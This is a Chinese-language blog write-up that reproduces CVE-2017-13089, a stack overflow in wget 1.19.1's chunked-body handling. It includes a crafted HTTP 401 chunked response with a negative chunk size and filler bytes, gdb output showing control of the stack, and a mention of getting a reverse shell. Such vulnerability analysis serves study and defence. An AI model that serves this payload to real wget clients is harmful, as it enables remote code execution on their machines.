0X00漏洞描述
Wget在401的情况时,会调用skip_short_body()函数
在skip_short_body()中,会对分块的编码进行strtol()函数调用,来读取每个块的长度
漏洞发生在没有对这个块的长度进行检查,如:是否为负数,在wget通过使用MIN()跳过512字节,将负数传递给fd_read(),但是fd_read接受的参数类型为INT,导致其高32位会被丢弃,进而可以控制传给fd_read()的参数
漏洞复现:
环境如下:
Ubuntu 16.04
Gdb-peda
Wget(versino:1.19.1)
Wget环境配置:
sudo apt-get install libneon27-gnutls-dev
在这一步时,遇到了一个小问题,安装报错了
解决办法:
cd /var/lib/dpkg sudo mv info info.bak sudo mkdir info sudo apt-get update
获取wget,由于网站证书过期了,所以需要加入 --no-check-certificate 参数
wget https://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz --no-check-certificate
编译完成后查看信息
wget -V
版本位 无误
为了方便复现,加上本身能力有限,这里关掉堆栈保护技术
操作如下:
进行重新编译
可以开始搞事情了
0x01分析
跟到skip_short_body()
箭头所指的HTTP_STATUS_UNAUTHORIZED在一开始被定义为401
在payload中
由于content-type 不为warc
所以会进入下面的else分支
进一步判断keep_alive head_only然后调用skip_short-body这个问题函数
跟进一下skip_short_body函数
看看到底写了多么伟大的函数
三个参数,除了第一个是sock的描述符外,剩余的两个我并不认识(好像没啥用
先利用sock获取fd_line的指针(http相应包的指针)
Char *line = fd_read_line(fd)
然后调用strtol函数
Strtol函数的定义如下:
Long int strtol (const char * nptr ,char ** endptr ,int base);
参数base范围从2至36,或0。参数base代表采用的进制方式,如base值为10则采用10进制,若base值为16则采用16进制等。当base值为0时则是采用10进制做转换
但遇到如’0x’前置字符则会使用16进制做转换、遇到’0’前置字符而不是’0x’的时候会使用8进制做转换。
一开始strtol()会扫描参数nptr字符串,跳过前面的空格字符,直到遇上数字或正负符号才开始做转换,再遇到非数字或字符串结束时('�')结束转换,并将转换数值返回。
参数endptr指向停止转换的位置,若字符串nptr的所有字符都成功转换成数字则endptr指向串结束符'�'。判断是否转换成功,应检查**endptr是否为'�'。
这里strtol将line变量指向的指变为整数,也就是(remaining_chunk_size)变量,然后通过MIN (remaining_chunk_size, SKIP_SIZE); 得到真正的响应体的长度 contlen。
MIN 的定义,取长度小的作为 contlen 的值:
# define MIN(a,b) ((a) < (b) ? (a) : (b))
然后调用了fd_read函数将响应体的内容复制到栈中,长度即为 contlen 变量的值
这里的fd_read对sock_read进行了封装
随后查看sock_read
存在栈溢出
调用了read函数
从buf中读取bufsize个字节,造成了缓冲区溢出
0X02复现
根据分析构造payload如下
HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-0xFFFFF000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0
接下来对12333端口进行监听
A窗口
B窗口:
在strtol处下断点
gdb-peda$ b *0x000000000041efaa
随后进入下一步
此时strtol的返回值为
0xffffffff00001000
继续n执行到fd_read看读入的参数
可以看到读入的第二个参数为
0x1000
与之前的
0xffffffff00001000
相比
只读入了低四位作为长度参数
在进入下一步之前
先查看0x7fffffffd190中的值
再执行下一步
可以看到全部覆盖为A
Continue
可以看到成功的控制了ebp,进而可以控栈上的数据然后ret进一步控制rip劫持
来计算一下偏移
0x03exp:
A窗口:
b窗口
反弹成功~
参考资料
- CVE-2017-13089 Detail
- https://github.com/r1b/CVE-2017-13089
觉得好看就点个赞吧!
